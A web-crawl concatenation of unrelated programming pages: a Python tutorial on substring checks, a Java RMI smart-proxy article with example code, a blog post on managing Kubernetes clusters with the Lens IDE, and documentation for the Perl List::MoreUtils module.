index(). As a result, find() is used in the following code: if "Codeunderscored is the best coding site".find("Code") != -1: print("Codeunderscored is the best coding site".find("Code")) else: print("Does not exist") And, once again, find() is case sensitive, requiring the usage of the.lower() method. if "Codeunderscored is the best coding site".lower().find("code") != -1: print("Codeunderscored is the best coding site".find("Code")) else: print("Does not exist") Example: using find() str="Hello, its Codeunderscored!" if str.find("underscored")!=-1: print("Found the string") else: print("Not found!!!") # Substring is searched between start index 2 and end index 5 print(str.find('its', 2, 5)) # Substring is searched start index 8 and end index 18 print(str.find('its ', 8, 18)) # How to use find() if (str.find('gloomy') != -1): print ("Contains given substring ") else: print ("Doesn't contain the given substring") Although using the str.find() method is less Pythonic, it is still acceptable. It’s a little lengthier and more perplexing, but it gets the job done. Regular Expressions in Python For pattern matching, regular expressions are commonly employed. re is a built-in library in Python that may be used to interact with Regular Expressions. The search() function in the re module is used to see if a string contains the supplied search pattern. The syntax for using the regular expressions is as follows: re.search(pattern, string, flags[optional]) code sample: from re import search str="Codeunderscored is all about coding!" substring = "red" if search("coding", str): print ("Substring Found!") else: print ("Not found!") Example: using regex to find a substring from re import search string = "Codeunderscored.com" substring = ".com" if search(substring, string): print("Found") else: print("Not found") When doing sophisticated operations on strings, use the other methods over REGEX covered in this post since they are much faster. Counting strings with the str.count() method The Python count() function counts the number of times a given substring appears in a string. The function returns 0 if the substring is not found in a string. str ="Condeunderscored is all about coding." str.count("coding") str.count("Coding") function __contains__() The contains() function of the Python String class is used to see if it contains another string. The contains () method is called internally when we employ the Python “in” operator; the has () method is called internally. Although methods that begin with underscores are regarded semantically private, the in operator is recommended for readability. When class instances exist on the right side of the in and not in operator, the contains method describes how they act. We could also use this function directly, but we won’t. What are the Caveats and Limitations? Because all methods are case-sensitive, remember to utilize the.lower() techniques. The index() method ensures that it is placed inside a try-except condition. Example: using List comprehension In our initial example, we will use list comprehension. List comprehension is a technique for determining whether or not a string contains a substring from a list. We check for both list and string entries in this example to see if we can find a match, and if we can, it returns true. The code below shows how to use list comprehension to determine whether a text contains a list element. To begin, the string named first str has been created. After that, the test list called fruits_list is created. For your convenience, we printed the original principles_message string and list before completing the function. Then we used list comprehension to see if the string included the list element and published the result. principles_message = "Two students in the classroom will each take up two Bananas." fruits_list = ['Mango', 'Bananas'] print("Principles message : " + principles_message) print("List of fruits : " + str(fruits_list )) the_result = [ele for ele in fruits_list if(ele in principles_message)] print("Is there a list element in the string? " + str(bool(the_result))) Example: Check to see if a Substring is found several times in a String The count() function in the String class is used to check if the string contains a substring twice. count() returns a number the number of times it appears in the string and 0 if the substring is not available in the string. Check if the count is equal to two to see if it exists twice. string = "codeunderscored is a site dedicated to code." if string.count("code") ==2: print("code exists twice in the string") else: print("code doesn't exist twice in the string") Example: Check to see if the string contains any substrings from the list You may need to see if a string has one of a list’s multiple substrings. For example, you could need to see if the given string has any vowels. You can do this in Python by using the List comprehension and the any() method. The ability to comprehend lists will return True if the iterated item is found in the String. On the other hand, If the current repeated item is not found in the String, False is returned. Overall, the result will be a list of True or False statements. The any() method will then verify at least one True value in the generated list. If Yes, the string has at least one vowel. If the answer is no, the string is devoid of vowels. #Code Snippet string = "Codeunderscored is a site dedicated to code" vowel_list = ['a','e','i','o','u'] if any(substring in string for substring in vowel_list): print("Vowels exists in the string") else: print("Vowels doesn't exist in the string") Example: Find all of a substring’s indexes The finditer() method in the regular expression package is used to find the index of every occurrence of a substring in a string. Import the regular expression package with import re to use it. To find all substring indexes in a string, use the procedure below. # Code Snippet import re string = "codeunderscored is a site dedicated to code" matches = re.finditer("code",string) indexes = [match.start() for match in matches] print(indexes) Example: Count the number of times a substring appears. The count() method counts the number of times a substring appears in a string. The method count() is responsible for returning the number of times it appears in the string or 0 if the substring does not exist. # Code Snippet string = "codeunderscored is a site dedicated to code" substring = "code" print(string.count(substring)) Conclusion One of the most common duties in any programming language is to see if a string contains a substring. As a result, several techniques exist to verify if a string includes a substring in Python. Remember that the in operator is the most straightforward way to determine whether a string contains a substring. In addition, the “in” operator, which is used as a comparison operator, is the simplest and fastest way to verify whether a string includes a substring or not in Python. Other Python functions, such as find(), index (), count(), and so on, can also be used to determine whether a string contains a substring.
https://www.codeunderscored.com/methods-to-check-if-a-python-string-contains-a-substring/
CC-MAIN-2022-21
refinedweb
2,060
64.61
Java Remote Method Invocation (RMI) gives clients access to objects in the server virtual machine (VM) in one of two ways: by reference or by value. To access a remote object by reference, the object must be an instance of a class that: - Implements an interface that extends java.rmi.Remote - Has a properly generated RMI stub class that implements the same interface - Is properly exported to allow incoming RMI calls. Smart proxies A smart proxy is a class, instantiated in the client VM, that holds onto a remote object reference. It implements the object's remote interface and typically forwards most of the calls on the interface to the remote object, just like an RMI stub. However, a smart proxy is more useful than the RMI stub in that you can change the behavior of the remote interface to do more than forward calls to the remote object. For instance, a smart proxy can locally cache state from the remote object to avoid the network overhead on every method call. CORBA implementations typically use a client-side object factory to instantiate smart proxies. The application calls a method of the factory to request a remote object reference. The factory gets the remote object reference, instantiates a smart proxy object that implements the same interface, and stores the remote reference in the proxy. The proxy is then returned to the caller. That approach works in pure Java applications as well. It has a few drawbacks, however. Client-side code typically has to know about the implementation of the server's objects, for instance, in order to know which attributes are safe to cache and which need to be read from the server each time. Another problem is that, as the server application changes, some remote objects that were good candidates for smart proxies might no longer be appropriate; other classes that didn't need a smart proxy on the client might now need one. Each of those changes requires changes on the client code that may already be distributed. A better solution would be to take advantage of RMI's ability to dynamically download classes that the client doesn't know about at runtime and implement the use of smart proxies in the server's code. That way, the client only knows that it is getting an object that implements the remote interface -- it doesn't know whether the object is a remote reference, a copy of a remote object, or a smart proxy. The server developer can, in fact, change the implementation from one of those to the other, and the client will continue to work without change. To implement smart proxies in the server, it helps to understand how RMI passes object references: - If the object returned from a remote method call implements an interface that extends java.rmi.Remote, the JVM believes that object should be a remote object and tries to construct an instance of the RMI stub for it. The stub is returned in place of the original object's reference. That is the pass-by-reference case as explained above; calls on the stub are forwarded to the server object. - Otherwise, if the object implements java.io.Serializable, the object itself is serialized and sent to the client VM, which then creates a copy of the object. (Primitive types, such as byte, char, boolean, int, and float, are always serialized and passed by value.) That is the pass-by-value case. - Finally, if neither of the above cases hold, an exception is thrown. When a serializable object is sent to the client VM, each of the object's non-transient fields goes through the same scrutiny. That is, if the field's type is a class that implements an interface that extends java.rmi.Remote (and it's not declared transient), an RMI stub is generated, sent to the client, and substituted for the field in the client's copy of the remote object. If the field is a reference to a serializable object, a copy of the field's data is serialized and sent to the client. In that case, the field in the client's VM will refer to that deserialized copy. That occurs recursively until all of the object graph's nontransient fields have been examined and sent appropriately. A smart proxy must, therefore, implement java.io.Serializable, while not implementing an interface that extends java.rmi.Remote. At the same time, the proxy must implement the same interface as the server object. That allows the client to use the proxy as if it was the server object. Achieving all three of those goals might appear a little tricky, however. How does the proxy implement the server object's interface and not implement java.rmi.Remote? The answer lies in refactoring the way remote objects are typically implemented. Conventional remote objects "Beg your pardon, sir, but your excuse, 'We've always done it this way,' is the most damaging phrase in the language." -Rear Admiral Grace Hopper, Ret. Suppose that you want remote access to a Door object that contains methods, which return the door location and detect if the door is open. To implement that in Java RMI, you need to define an interface that extends java.rmi.Remote. That interface would also declare the methods that comprise the object's remote interface. Likewise, you need to define a class that implements that interface and can be exported as a remote object. The easiest way to define that class is to extend java.rmi.server.UnicastRemoteObject. That leads to the design shown in the UML class diagram below. The remote interface, Door, extends java.rmi.Remote and declares the interface you need for Door objects. DoorImpl is the class that actually implements the Door interface. DoorImpl also extends java.rmi.server.UnicastRemoteObject so that instances of it can be accessed remotely. Below is the code that you could use to implement that design: /** * Define the remote interface of a Door. * @author M. Jeff Wilson * @version 1.0 */ public interface Door extends java.rmi.Remote { String getLocation() throws java.rmi.RemoteException; boolean isOpen() throws java.rmi.RemoteException; } /** * Define the remote object that implements the Door interface. * @author M. Jeff Wilson * @version 1.0 */ public class DoorImpl extends java.rmi.server.UnicastRemoteObject implements Door { private final String name; private boolean open = false; public DoorImpl(String name) throws java.rmi.RemoteException { super(); this.name = name; } // in this implementation, each Door's name is the same as its // location. // we're also assuming the name will be unique. public String getLocation() { return name; } public boolean isOpen() { return open; } // assume the server side can call this method to set the // state of this door at any time void setOpen(boolean open) { this.open = open; } // convenience method for server code String getName() { return name; } // override various Object utility methods public String toString() { return "DoorImpl:["+ name +"]"; } // DoorImpls are equivalent if they are in the same location public boolean equals(Object obj) { if (obj instanceof DoorImpl) { DoorImpl other = (DoorImpl)obj; return name.equals(other.name); } return false; } public int hashCode() { return toString().hashCode(); } } Now that you've defined and implemented the Door interface, the next step is to allow remote clients to access Door's various instances. One way to do that is to bind each instance of DoorImpl to the RMI registry. The client would then have to construct a URL that contained the name of each Door it wanted, and do a naming service lookup on each Door to retrieve its RMI stub. That not only clutters up the RMI registry with a lot of names (one for each Door), but it is unnecessary work for the client as well. A better approach is to have one object bound in the RMI registry that keeps a collection of all the Doors in the server. Clients can look up the name of that object in the registry, then make remote method calls on the object to retrieve specific Doors. The design of such a DoorServer is shown in Figure 2. Notice that DoorServer and DoorServerImpl looks a lot like Door and DoorImpl because you are defining another remote interface ( DoorServer) and the class that implements it ( DoorServerImpl). One difference is that DoorServerImpl hangs on to a collection of DoorImpl. It will use that collection to fulfill its public Door.getDoor(String location) method. Here's one possible implementation of the DoorServer design: /** * We need a class to serve Door objects to clients. * First, create the server's remote interface. * @author M. Jeff Wilson * @version 1.0 */ public interface DoorServer extends java.rmi.Remote { Door getDoor(String location) throws java.rmi.RemoteException; } /** * Define the class to implement the DoorServer interface. * @author M. Jeff Wilson * @version 1.0 */ public class DoorServerImpl extends java.rmi.server.UnicastRemoteObject implements DoorServer { /** * HashMap used to store instances of DoorImpl. The map will be keyed * by each DoorImpl's name attribute, so it is implied that two Doors * with the same name are equivalent. */ private java.util.Hashtable hash = new java.util.Hashtable(); public DoorServerImpl() throws java.rmi.RemoteException { // add a door to the hashmap DoorImpl impl = new DoorImpl("location1"); hash.put(impl.getName(), impl); } /** * @param location - String value of the Door's location * @return an object that implements Door, given the location */ public Door getDoor (String location) { return (Door)hash.get(location); } /** * Bootstrap the server by creating an instance of DoorServer and * binding its name in the RMI registry. */ public static void main(String[] args) { System.setSecurityManager(new java.rmi.RMISecurityManager()); // make the remote object available to clients try { DoorServerImpl server = new DoorServerImpl(); java.rmi.Naming.rebind("rmi://host/DoorServer", server); } catch (Exception e) { e.printStackTrace(); System.exit(1); } } } Finally, to wrap things up, the client code that gets an instance of Door might look like this: try { // get the DoorServer from the RMI registry DoorServer server = (DoorServer)Naming.lookup("rmi://host/DoorServer"); // Use DoorServer to get a specific Door Door theDoor = server.getDoor("location1"); // invoke methods on the returned Door if (theDoor.isOpen()) { // handle the door-open case ... } } catch (Exception e) { e.printStackTrace(); } In that implementation, the client has to find the DoorServer by asking the RMI registry for it (via the call to Naming.lookup(URL)). Once the DoorServer is found, the client can ask for specific Door instances by calling DoorServer.getDoor(String), passing the Door's location.
https://www.infoworld.com/article/2076234/get-smart-with-proxies-and-rmi.html
CC-MAIN-2020-45
refinedweb
1,728
56.25
Domain Reloading resets your scripting state, and is enabled by default. It provides you with a completely fresh scripting state, and resets all static fields and registered handlers each time you enter Play Mode. This means each time you enter Play Mode in the Unity Editor, your Project begins playing in a very similar way to when it first starts up in a build. Domain Reloading takes time, and this time increases with the number and complexity of the scripts in your Project. When it takes a long time to enter Play Mode, it becomes harder to rapidly iterate on your Project. This is the reason Unity provides the option to turn off Domain Reloading. When Domain Reloading is disabled, entering Play Mode is faster, because Unity does not reset the scripting state each time. However, it is then up to you to ensure your scripting state resets when you enter Play Mode. To do this, you need to add code that resets your scripting state when Play Mode starts. When Domain Reloading is disabled, Unity still refreshes the scripting state when you update or re-import a script, based on your auto-refresh settings. To ensure your your scripting states correctly reset at Play Mode, you need to make adjustments to static fields and static event handlers in your scripts. When Domain Reloading is disabled, the values of static fields in your code do not automatically reset to their original values. You need to add code that explicitly does this. The following code example has a static counter field which increments when the user presses the Jump button. When Domain Reloading is enabled, the counter automatically resets to zero when entering Play Mode. When Domain Reloading is disabled, the counter does not reset; it keeps its value in and out of Play Mode. This means that on a second run of your Project in the Editor, the counter might not be at zero if it changed in the previous run. using UnityEngine; public class StaticCounterExample : MonoBehaviour { // this counter will not reset to zero when Domain Reloading is disabled static int counter = 0; // Update is called once per frame void Update() { if (Input.GetButtonDown("Jump")) { counter++; Debug.Log("Counter: " + counter); } } } To make sure the counter resets even when Domain Reloading is disabled, you must use the [RuntimeInitializeOnLoadMethod(RuntimeInitializeLoadType.SubsystemRegistration)] attribute, and reset the value explicitly: using UnityEngine; public class StaticCounterExampleFixed : MonoBehaviour { static int counter = 0; [RuntimeInitializeOnLoadMethod(RuntimeInitializeLoadType.SubsystemRegistration)] static void Init() { Debug.Log("Counter reset."); counter = 0; } // Update is called once per frame void Update() { if (Input.GetButtonDown("Jump")) { counter++; Debug.Log("Counter: " + counter); } } } With Domain Reloading disabled, Unity will, causing those methods to be called twice when the event occurs. For example, this code registers a method with the static event handler Application.quitting With Domain Reloading enabled, Unity automatically resets the event handler when Play Mode starts, so the method is only ever registered once. However, with Domain Reloading disabled, the event handler is not cleared, so on the second run of your Project in the editor, the method is registered a second time, and is called twice when the event occurs - which is usually undesirable. using UnityEngine; public class StaticEventExample : MonoBehaviour { void Start() { Debug.Log("Registering quit function"); Application.quitting += Quit; } static void Quit() { Debug.Log("Quitting!"); } } When Domain Reloading is disabled, the above example adds the Quit method again each time you enter Play Mode. This results in an additional “Quitting” message each time you exit Play Mode. To ensure the event handler resets even when Domain Reloading is disabled, you must use the [RuntimeInitializeOnLoadMethod] attribute, and unregister the method explicitly so that it is not added twice. using UnityEngine; public class StaticEventExampleFixed : MonoBehaviour { [RuntimeInitializeOnLoadMethod] static void RunOnStart() { Debug.Log("Unregistering quit function"); Application.quitting -= Quit; } void Start() { Debug.Log("Registering quit function"); Application.quitting += Quit; } static void Quit() { Debug.Log("Quitting the Player"); } } For runtime scripts, you must use the [RuntimeInitializeOnLoadMethod(RuntimeInitializeLoadType.SubsystemRegistration)] attribute to reset static fields and event handlers. For Editor scripts such as custom Editor windows or Inspectors that use statics, you must use the [InitializeOnEnterPlayMode] attribute to reset static fields and event handlers.
https://docs.unity3d.com/ru/2019.4/Manual/DomainReloading.html
CC-MAIN-2021-17
refinedweb
692
55.54
We're pleased to announce the release BigBlueButton 0.8-RC2. Our goal since the beginning of this release has been to integrate record and playback into BigBlueButton's core. This release is the culmination of months of effort (our last release was January 14, 2010). With this release, you can now record and playback slides, audio, and chat within BigBlueButton. This enables BigBlueButton to address a much wider set of use cases for distance education. For a detailed list of changes, see 0.8-RC2 release notes. If you have any problems not answered by this document, or you have questions/feedback, please post to bigbluebutton-setup. If you encounter a bug when using BigBlueButton, please report it so we can continue to improve BigBlueButton for the benefit of all. These instructions require you install BigBlueButton 0.8 on a Ubuntu 10.04 32-bit or 64-bit server (or desktop). We've not tested the installation on earlier or later versions of Ubuntu. We recommend installing BigBlueButton on a dedicated (non-virtual) server for optimal performance. To install BigBlueButton, you'll need root access to a Ubuntu 10.04 server with Currently, as of BigBlueButton 0.8-RC2, locale of the server must be en_US.UTF-8. You can verify this by $ cat /etc/default/locale LANG="en_US.UTF-8" If you are upgrading from BigBlueButton 0.71a, start here. If you are upgrading from an earlier BigBlueButton 0.8 beta, do the following sudo apt-get update sudo apt-get dist-upgrade If you've made custom changes to BigBlueButton, such as then you'll need to backup your changes before doing the following upgrade, after which you can reapply the changes. At some point in the process you may be asked to update configuration files, as in] ? Enter 'Y' each time continue the upgrade. After BigBlueButton updates, restart all the processes After the install finishes, restart your BigBlueButton server with sudo bbb-conf --clean sudo bbb-conf --check To make it easy for you to setup your own BigBlueButton 0.8 server, we've put together the following overview video. We recommend you following the video with these step-by-step instructions below. You first need to give your server access to the BigBlueButton package repository for 0.8. an resolve this by manually installing the gems. To interactively test your BigBlueButton server, our demo server. Later on, if you wish to remove the API demos, you can enter the command sudo apt-get purge bbb-demo To ensure BigBlueButton has started cleanly, enter the following commands: sudo bbb-conf --clean sudo bbb-conf --check The output from sudo bbb-conf --check will display your current settings and, after the text, " Potential problems described below ", print any potential configuration or startup problems it has detected. Got to Trying out your sever. The following steps will upgrade a standard installation of BigBlueButton 0.71a to 0.8. A 'standard installation' is an installation of BigBlueButton 0.71a that has been configured using the standard commands sudo bbb-conf --setip <ip/hostname> sudo bbb-conf --setsalt <salt> If you've made custom changes to BigBlueButton 0.71a, such as First, let's update all the current packages on your server (including the kernel) to ensure your starting with an up-to-date system. sudo apt-get update sudo apt-get dist-upgrade Follow the instructions here. This step will uninstall FreeSWITCH 1.0.6. BigBlueButton 0.8 requires FreeSWITCH 1.0.7 for recording of sessions. In later steps, the BigBlueButton 0.8 will install and configure FreeSWITCH 1.0.7. Before upgrading, first remove the older FreeSWITCH packages. sudo apt-get purge freeswitch freeswitch-sounds-en-us-callie-16000 freeswitch-sounds-en-us-callie-8000 freeswitch-sounds-music-16000 Check to ensure that there are no remaining FreeSWITCH packages. dpkg -l | grep freesw If there are any remaining packages, such as freeswitch-lang-en, then purge those as well sudo apt-get purge freeswitch-lang-en First, update the BigBlueButton repository URL to the beta repository. echo "deb bigbluebutton-lucid main" | sudo tee /etc/apt/sources.list.d/bigbluebutton.list Next, update the local packages. This will make apt-get aware of the newer packages for BigBlueButton 0.8. sudo apt-get update The following command will upgrade your packages to the latest beta. sudo apt-get dist-upgrade After a few moments you'll be prompted whether you want to overwrite /etc/nginx/sites-available/bigbluebutton.] ? Type 'y' and hit Enter. Now let's install and configure FreeSWITCH 1.0.7. sudo apt-get install bbb-freeswitch-config Install the API demos to interactively try BigBlueButton. sudo apt-get install bbb-demo We no longer need activmq, so let's remove it. The command sudo apt-get autoremove will remove all remaining packages that have no reference. sudo apt-get purge activemq sudo apt-get autoremove Let's do the standard clean restart and then check the system for any potential problems. sudo bbb-conf --clean sudo bbb-conf --check You've got a full BigBlueButton server up and running (don't you just love the power of Ubuntu/Debian packages). Open a web browser to the URL of your server. You should see the BigBlueButton welcome screen. To start using your BigBlueButton server, enter your name and click the 'Join' button. You'll join the Demo Meeting. If this is your first time using BigBlueButton, take a moment and watch these overview videos. To record a session, click 'API Demos' on the welcome page and choose 'Record'. Start a meeting and upload slides. When you are done, click 'Logout' and return to the 'API Demos' and the record demo. Wait a few moments and refresh your browser, you should see your recording appear. Click 'Slides' to playback the slides, audio, and chat of the recording. The following YouTube Video will walk you through using record and playback. If you want to use BigBlueButton with a 3rd party integration, you can get the URL and security salt from your server using the command bbb-conf --salt. $ bbb-conf --salt URL: Salt: b22e37979cf3587dd616fa0a4e6228 We hope you enjoy using BigBlueButton and welcome your feedback! If you don't find an answer to your questions below, check out our Frequently Asked Questions. A common question is How do I setup multiple virtual classrooms? We've built in a BigBlueButton configuration utility, called bbb-conf, to help you configure your BigBlueButton server and trouble shoot. For example, here's the output on one of our internal servers: If you see text after the line ** Potential problems described below **, then bbb-conf detected something wrong with your setup. For some VPS installations of Ubuntu 10.04, the hosting provider does not give a full /etc/apt/source.list. If you are finding your are unable to install a package, try replacing your /etc/apt/sources.list with the following # # # deb cdrom:[Ubuntu-Server 10.04 LTS _Lucid Lynx_ - Release amd64 (20100427)]/ lucid main restricted # deb cdrom:[Ubuntu-Server 10.04 LTS _Lucid Lynx_ - Release amd64 (20100427)]/ then do sudo apt-get update and try installing BigBlueButton again. A common problem is the default install scripts in for BigBlueButton configure it to list for an IP address, but if you are accessing your server via a DNS hostname, you'll see the 'Welcome to Nginx' message. To change all of BigBlueButton's configuration files to use a different IP address or hostname, enter sudo bbb-conf --setip <ip_address_or_hostname> For more information see bbb-conf options. If you have apache2 already running on the server, you'll likely see the following error messages from nginx when it starts. Restarting nginx: [emerg]: bind() to 0.0.0.0:80 failed (98: Address already in use) If you see these errors, it means that nginx is unable to bind to port 80 on the local server. To find out what's binding to port 80, do the following sudo apt-get install lsof lsof -i :80 If you see apache2 listed, then stop apache2 and start nginx sudo /etc/init.d/apache2 stop sudo /etc/init.d/nginx start The install script for bbb-record-core needs to install a number of ruby gems. However, if you are behind a HTTP_PROXY, then the install script for bbb-record-core will likely exit with an error. This occurs because the bash environment for bbb-record-core will not have a value for HTTP_PROXY. You can resolve this by manually installing the gems using the following script. #!/bin/bash export HTTP_PROXY="<your_http_proxy>" gem install --http-proxy $HTTP_PROXY builder -v 2.1.2 gem install --http-proxy $HTTP_PROXY diff-lcs -v 1.1.2 gem install --http-proxy $HTTP_PROXY json -v 1.4.6 gem install --http-proxy $HTTP_PROXY term-ansicolor -v 1.0.5 gem install --http-proxy $HTTP_PROXY gherkin -v 2.2.9 gem install --http-proxy $HTTP_PROXY cucumber -v 0.9.2 gem install --http-proxy $HTTP_PROXY cucumb -v 0.9.2 gem install --http-proxy $HTTP_PROXY curb -v 0.7.15 gem install --http-proxy $HTTP_PROXY mime-types -v 1.16 gem install --http-proxy $HTTP_PROXY nokogiri -v 1.4.4 gem install --http-proxy $HTTP_PROXY rack -v 1.2.2 gem install --http-proxy $HTTP_PROXY redis -v 2.1.1 gem install --http-proxy $HTTP_PROXY redis-namespace -v 0.10.0 gem install --http-proxy $HTTP_PROXY tilt -v 1.2.2 gem install --http-proxy $HTTP_PROXY sinatra -v 1.2.1 gem install --http-proxy $HTTP_PROXY vegas -v 0.1.8 gem install --http-proxy $HTTP_PROXY resque -v 1.15.0 gem install --http-proxy $HTTP_PROXY rspec-core -v 2.0.0 gem install --http-proxy $HTTP_PROXY rspec-expectations -v 2.0.0 gem install --http-proxy $HTTP_PROXY rspec-mocks -v 2.0.0 gem install --http-proxy $HTTP_PROXY rspec -v 2.0.0 gem install --http-proxy $HTTP_PROXY rubyzip -v 0.9.4 gem install --http-proxy $HTTP_PROXY streamio-ffmpeg -v 0.7.8 gem install --http-proxy $HTTP_PROXY trollop -v 1.16.2 Once all the gems are installed, you can restart the installation process with the command sudo apt-get install -f
http://code.google.com/p/bigbluebutton/wiki/08InstallationUbuntu
crawl-003
refinedweb
1,702
58.89
Numerous reports have consistently shown that enterprises today embrace hybrid and multicloud as their preferred modes of IT infrastructure deployment. According to a survey done by IDG, more than half (55%) of organizations currently use multiple public clouds, with 21% saying they use three or more. As developers are becoming acclimated to building and shipping containers, Kubernetes has clearly become the go-to choice for container orchestration. There are numerous reasons why an organization would deploy Kubernetes across multiple cloud vendors: Cloud bursting In a multicloud infrastructure, “bursting” involves using resources from one cloud to supplement the resources of another. If an organization using a private cloud reaches 100 percent of its resource capacity, the overflow traffic is directed to a public cloud to avoid any interruption of services. Disaster recovery and backup In practice, you do not want one cloud provider to be the single point of failure. By spreading recovery resources across clouds, you achieve greater resilience and availability than in a single cloud infrastructure. With all of that infrastructure in place, it is very challenging for IT Operations teams to manage multiple clusters. The following challenges arise: - To access the clusters, a huge number of kubectl and kubeconfig files need to be maintained. One would have to context-switch between them for different clusters/projects and the added complexity of differences in access methods across cloud providers can be cumbersome. - While developers typically focus on writing code, today it is not uncommon for them to learn the operations side of applications. While Kubernetes is designed to help them ship and update applications much faster, it is complex by itself. Getting up to speed with concepts and accelerating their learning curve was desired, so that they focus on what matters: the application code. - Troubleshooting in Kubernetes is not a trivial task. During the course of a debugging session, the admin would have to identify errors from pod logs and events, pod status, etc. A new admin could easily spend a lot of valuable time figuring out the correct commands and logs to check impacting the business adversely. Kubernetes exposes a standard dashboard that provides an overview of applications running on your cluster, but this is done at the individual cluster level. It is desired to have a unified management solution that would address the challenges above. We will focus on the open-source solution Lens today. Lens is a standalone application that is available on MacOS, Windows, and Linux, which means you don’t have to install any packages in the Kubernetes nodes themselves. The single IDE can be used to manage all your clusters on any platform just by importing the kubeconfig file. Let’s jump in and take a look. Installing Lens Navigate to the Lens webpage, download and install it for your preferred OS. Immediately after opening the application, hit the ‘+’ button to add your cluster. You could either import the kubeconfig file or paste it and voila! Let the magic begin. I have deployed two clusters, one with Karbon (Nutanix’s Kubernetes Management Solution), on Nutanix private cloud, and the second one using Azure Kubernetes Service. Importing the kubeconfig file for the AKS cluster is shown below. In the cluster overview, you can see all available cluster resources via a single pane of glass. You can view all your workloads, their current state, any related events and even filter them by namespaces. Clicking on any resource will pull up all the details about it– basically, the same as you would see from the output of: kubectl get <daemonset|pod|deployment> -n <namespace> <name> -o yaml Deploying an application Here, I’ve added the Karbon cluster, as well in Lens. Let’s go ahead and deploy a Cassandra StatefulSet onto this cluster. The YAML I used is below: apiVersion: v1 kind: Service metadata: labels: app: cassandra name: cassandra spec: clusterIP: None ports: - port: 9042 selector: app: cassandra --- volumeMounts: - name: cassandra-data mountPath: /cassandra_data volumeClaimTemplates: - metadata: name: cassandra-data spec: accessModes: [ "ReadWriteOnce" ] storageClassName: default-storageclass resources: requests: storage: 1Gi Right after applying it, you can see the StatefulSet, services, pods, and other resources being created via Lens. You can check out the live logs being updated for the Pods which is invaluable for troubleshooting. All of the events are recorded on the same page as well, which is the output of what you would see from: kubectl describe pod cassandra-0 These are definitely great tools that would save you a lot of hassle and time during deployments. Furthermore, you could drop into the shell inside the pod as well on the same page. We verify that all the three nodes of the Cassandra cluster are running, as is shown in the screenshot below. If you are still not impressed, Lens does give you the option to create, update, and delete resources right from its GUI as well as from the in-built terminal, which is automatically switched to the right context. Let’s go ahead and deploy a ReplicaSet to bring up three nginx pods. This will be deployed in the “nginx” namespace which was again created from Lens. RBAC Authorization Kubernetes RBAC is supported, which means individual users connecting to Kubernetes clusters via Lens can only interact with the resources they are allowed to. In the image below, you can see a domain user [email protected] has imported his kubeconfig file but he doesn’t have the authority to list any pods. The cluster admin deploys the following YAML file, creating the Role sre-role and a RoleBinding sre-role-binding for this user [email protected]. apiVersion: v1 kind: Namespace metadata: name: sre --- apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: namespace: sre name: sre-role rules: - apiGroups: ["", "apps", "batch", "extensions"] resources: ["services", "endpoints", "pods", "deployments"] verbs: ["get", "list", "watch"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: namespace: sre name: sre-role-binding subjects: - kind: User name: [email protected] apiGroup: rbac.authorization.k8s.io roleRef: kind: Role name: sre-role apiGroup: rbac.authorization.k8s.io Following this, we see the user is authorized to perform the same action as seen below. Conclusion Kubernetes is a complex platform with a rapidly-expanding set of capabilities. Users are best served by tools and technologies that simplify Kubernetes management across the lifecycle. Lens, with its rich set of features and dashboard, offers Kubernetes admins an effective means of simplifying multicloud management. It requires minimal learning, offers easy context switching between multiple Kubernetes clusters, real-time cluster state visualization, and even enforcement of RBAC security using the standard Kubernetes API. Lens can significantly improve productivity, and it is an excellent choice to administer your Kubernetes clusters in a multicloud configuration! Guest post by Nimal Kunnath, Systems Reliability Engineer at Nutanix
https://aster.cloud/2021/01/07/multicloud-kubernetes-management-with-lens/
CC-MAIN-2021-10
refinedweb
1,125
51.07
Imagine if you, in your code, want to find out if Zope is running in debug mode or not, then how do you do that? Here's my take on it that I learned today: from Globals import DevelopmentMode class MyProduct(Folder): def save(self, file): if DevelopmentMode: print "Saving the file now" self._save(file) The example doesn't do much justice because your product code should perhaps use its own "debug mode parameter" to get greater control. I needed this because instead of using the Auto refresh feature inside the ZMI I have a script that periodically checks for changes and does a manual refresh. When you're not in debug mode, a change to a .dtml or .zpt requires a refresh whereas when you're in debug mode it doesn't need refreshing to see the changes. I'll try to find some later later this month to write about and share my refresh script which is something that I now can't live work without when doing Zope development.
http://www.peterbe.com/plog/zope-in-developmentmode
CC-MAIN-2014-42
refinedweb
173
64.95
#include <mitkLabeledImageLookupTable.h> A lookup table for 2D mapping of labeled images. The lookup table supports images with up to 256 unsigned labels. Negative labels are not supported. Please use the level/window settings as given by the GetLevelWindow() method to make sure, that the colors are rendered correctly. The colors are initialized with random colors as default. As background the label 0 is assumed. The color for the background is set to fully transparent as default. Definition at line 33 of file mitkLabeledImageLookupTable.h. The data type for a label. Currently only images with labels in the range [0,255] are supported. Definition at line 45 of file mitkLabeledImageLookupTable.h. Default constructor. Protected to prevent "normal" creation Virtual destructor Generates a random rgb color value. Values for rgb are in the range [0,1] Generates a radnom number drawn from a uniform distribution in the range [0,1]. Determines the color which will be used for coloring a given label. Provides access to level window settings, which should be used in combination with the LUTs generated by this filter (at lease for 2D visualization. If you use other level/window settings, it is not guaranteed, that scalar values are mapped to the correct colors. Definition at line 80 of file mitkLabeledImageLookupTable.h. Standard mitk typedefs are generated by the mitkClassMacro Make this object constructable by the ::New() Method. implementation necessary because operator made private in itk::Object Reimplemented from mitk::LookupTable. Sets the color for a given label Definition at line 105 of file mitkLabeledImageLookupTable.h.
https://docs.mitk.org/nightly/classmitk_1_1LabeledImageLookupTable.html
CC-MAIN-2021-43
refinedweb
257
50.53
}; List::MoreUtils provides some trivial but commonly needed functionality on lists which is not going to go into List::Util. All of the below functions are implementable in only a couple of lines of Perl code. Using the functions from this module however should give slightly better performance as everything is implemented in C. The pure-Perl implementation of these functions only serves as a fallback in case the C portions of this module couldn't be compiled on this machine._val is an alias for firstval. Returns the last value in LIST for which BLOCK evaluates to true. Each element of LIST is set to $_ in turn. Returns undef if no such element has been found. last_val] Nothing by default. To import all of this module's symbols, do the conventional use List::MoreUtils ':all'; It may make more sense though to only import the stuff your program actually needs: use List::MoreUtils qw{ any firstidx }; When LIST_MOREUTILS_PP is set, the module will always use the pure-Perl implementation and not the XS one. This environment variable is really just there for the test-suite to force testing the Perl implementation, and possibly for reporting of bugs. I don't see any reason to use it in a production environment. There is a problem with a bug in 5.6.x perls. It is a syntax error to write things like: my @x = apply { s/foo/bar/ } qw{ foo bar baz }; It has to be written as either my @x = apply { s/foo/bar/ } 'foo', 'bar', 'baz'; or my @x = apply { s/foo/bar/ } my @dummy = qw/foo bar baz/; Perl 